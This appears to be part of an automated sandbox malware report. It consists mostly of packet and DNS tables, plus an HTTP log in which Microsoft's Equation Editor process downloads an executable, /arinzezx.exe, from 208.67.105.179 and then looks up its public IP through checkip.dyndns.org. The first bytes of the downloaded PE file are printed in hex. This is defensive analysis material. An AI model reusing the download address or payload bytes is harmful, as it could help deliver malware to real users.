Nov 29, 2022 16:50:19.792278051 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792306900 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792315006 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792344093 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792354107 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792377949 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792622089 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792685986 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792716026 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792727947 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792742014 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792776108 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792783022 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792809963 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792825937 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792854071 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792870998 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792870998 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792896032 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792907000 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792933941 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.792943954 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.792973042 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.793001890 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.793015003 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.793044090 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.793065071 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.793082952 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.793286085 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.819551945 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819606066 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819636106 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819664955 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819715023 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819740057 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.819758892 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.819782019 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819809914 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819820881 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.819843054 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.819854021 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819879055 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.819906950 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.819916964 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.819960117 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820009947 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820034981 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820077896 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820097923 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820122004 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820146084 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820161104 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820183039 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820194006 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820329905 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820363045 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820395947 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820409060 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820444107 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820456982 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820485115 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820496082 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820524931 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820554972 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820565939 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820599079 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820606947 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820655107 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820667028 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820691109 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820703983 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820759058 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820794106 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820827007 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820838928 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820863008 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820880890 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820928097 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.820946932 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.820962906 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.821019888 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.821029902 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.821057081 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.821069002 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.821078062 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.821093082 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.821115017 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.821158886 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.821187973 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.821199894 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.821822882 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848135948 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848179102 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848436117 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848598957 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848634958 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848660946 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848679066 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848686934 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848706961 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848722935 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848735094 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848761082 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848774910 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848789930 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848808050 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848834038 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848850012 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848870039 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848881006 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848906994 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848917007 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848938942 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.848953962 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848979950 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.848990917 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849005938 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849024057 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849051952 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849062920 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849080086 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849106073 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849136114 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849148989 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849175930 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849183083 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849208117 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849220037 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849251032 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849258900 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849286079 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849303961 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849334002 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849342108 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849368095 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849379063 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849399090 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849411964 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849437952 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849452019 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849463940 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849483967 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849509001 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849519014 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849541903 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849560022 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849577904 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849589109 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849610090 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849633932 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849642992 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849642992 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849675894 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849684000 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849709988 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849720955 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849746943 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.849756956 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.849795103 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877372026 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877428055 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877455950 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877475977 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877507925 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877507925 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877528906 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877557039 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877578020 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877595901 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877609968 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877634048 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877655029 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877671957 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877682924 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877712965 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877721071 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877746105 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877756119 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877783060 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877789974 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877814054 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877825022 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877854109 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877862930 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877891064 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877907991 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877923965 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.877943039 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877969980 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.877981901 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878004074 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878015995 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878041983 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878055096 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878073931 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878089905 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878114939 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878139973 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878164053 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878189087 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878200054 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878226995 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878237963 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878262043 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878288031 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878305912 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878323078 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878331900 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878357887 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878377914 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878397942 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878412008 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878436089 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878447056 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878458977 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878479004 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878494978 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878520012 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878532887 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878550053 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.878560066 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.878585100 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.879122019 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:21.294394970 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:27.766694069 CET	49172	80	192.168.2.22	193.122.6.168
Nov 29, 2022 16:50:27.784252882 CET	80	49172	193.122.6.168	192.168.2.22
Nov 29, 2022 16:50:27.784404039 CET	49172	80	192.168.2.22	193.122.6.168
Nov 29, 2022 16:50:27.785404921 CET	49172	80	192.168.2.22	193.122.6.168
Nov 29, 2022 16:50:27.802810907 CET	80	49172	193.122.6.168	192.168.2.22
Nov 29, 2022 16:50:27.807564974 CET	80	49172	193.122.6.168	192.168.2.22
Nov 29, 2022 16:50:28.020271063 CET	49172	80	192.168.2.22	193.122.6.168
Nov 29, 2022 16:50:28.032141924 CET	80	49172	193.122.6.168	192.168.2.22
Nov 29, 2022 16:50:28.032217026 CET	49172	80	192.168.2.22	193.122.6.168
Nov 29, 2022 16:51:32.805107117 CET	80	49172	193.122.6.168	192.168.2.22
Nov 29, 2022 16:51:32.805300951 CET	49172	80	192.168.2.22	193.122.6.168
Nov 29, 2022 16:52:13.151828051 CET	49172	80	192.168.2.22	193.122.6.168
Nov 29, 2022 16:52:13.169460058 CET	80	49172	193.122.6.168	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 16:50:27.643722057 CET	55868	53	192.168.2.22	8.8.8.8
Nov 29, 2022 16:50:27.662585974 CET	53	55868	8.8.8.8	192.168.2.22
Nov 29, 2022 16:50:27.702518940 CET	49688	53	192.168.2.22	8.8.8.8
Nov 29, 2022 16:50:27.721494913 CET	53	49688	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 16:50:27.643722057 CET	192.168.2.22	8.8.8.8	0xb186	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.702518940 CET	192.168.2.22	8.8.8.8	0x63a8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 16:50:27.662585974 CET	8.8.8.8	192.168.2.22	0xb186	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:50:27.662585974 CET	8.8.8.8	192.168.2.22	0xb186	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.662585974 CET	8.8.8.8	192.168.2.22	0xb186	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.662585974 CET	8.8.8.8	192.168.2.22	0xb186	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.662585974 CET	8.8.8.8	192.168.2.22	0xb186	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.662585974 CET	8.8.8.8	192.168.2.22	0xb186	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.721494913 CET	8.8.8.8	192.168.2.22	0x63a8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 16:50:27.721494913 CET	8.8.8.8	192.168.2.22	0x63a8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.721494913 CET	8.8.8.8	192.168.2.22	0x63a8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.721494913 CET	8.8.8.8	192.168.2.22	0x63a8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.721494913 CET	8.8.8.8	192.168.2.22	0x63a8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 29, 2022 16:50:27.721494913 CET	8.8.8.8	192.168.2.22	0x63a8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

208.67.105.179

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	208.67.105.179	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 29, 2022 16:50:19.325438976 CET	0	OUT	GET /arinzezx.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 208.67.105.179 Connection: Keep-Alive
Nov 29, 2022 16:50:19.357974052 CET	1	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 15:50:19 GMT Server: Apache Last-Modified: Tue, 29 Nov 2022 07:44:35 GMT ETag: "cda00-5ee9728c85e41" Accept-Ranges: bytes Content-Length: 842240 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2d b6 85 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d2 0c 00 00 06 00 00 00 00 00 00 e2 f0 0c 00 00 20 00 00 00 00 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 f0 0c 00 4f 00 00 00 00 00 0d 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 d0 0c 00 00 20 00 00 00 d2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 03 00 00 00 00 0d 00 00 04 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0d 00 00 02 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 f0 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 3c e5 00 00 fc 8f 00 00 03 00 00 00 6c 00 00 06 38 75 01 00 58 7b 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 14 00 00 0a 00 00 02 28 07 00 00 06 00 2a 13 30 01 00 16 00 00 00 01 00 00 11 00 73 14 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 01 00 16 00 00 00 02 00 00 11 00 73 0f 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 01 00 16 00 00 00 03 00 00 11 00 73 08 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 01 00 16 00 00 00 04 00 00 11 00 73 1a 00 00 06 0a 06 6f 15 00 00 0a 00 02 28 16 00 00 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 05 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 17 00 00 0a 00 00 02 03 28 18 00 00 0a 00 2a 00 13 30 06 00 72 04 00 00 06 00 00 11 00 d0 02 00 00 02 28 19 00 00 0a 73 1a 00 00 0a 0a 02 73 1b 00 00 0a 7d 02 00 00 04 02 73 1b 00 00 0a 7d 03 00 00 04 02 73 1b 00 00 0a 7d 04 00 00 04 02 73 1b 00 00 0a 7d 05 00 00 04 02 28 1c 00 00 0a 00 02 7b 02 00 00 04 28 1d 00 00 0a 6f 1e 00 00 0a 00 02 7b 02 00 00 04 19 6f 1f 00 00 0a 00 02 7b 02 00 00 04 16 6f 20 00 00 0a 00 02 7b 02 00 00 04 72 01 00 00 70 22 00 00 40 41 17 19 16 73 21 00 00 0a 6f 22 00 00 0a 00 02 7b 02 00 00 04 28 23 00 00 0a 6f 24 00 00 0a 00 02 7b 02 00 00 04 20 a3 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL-c0 @ @@O H.text `.rsrc@@.reloc @BH<l8uX{^}((0so(0so(0so(0so(0+,{+,{o(0r(ss}s}s}s}({(o{o{o {rp"@As!o"{(#o${
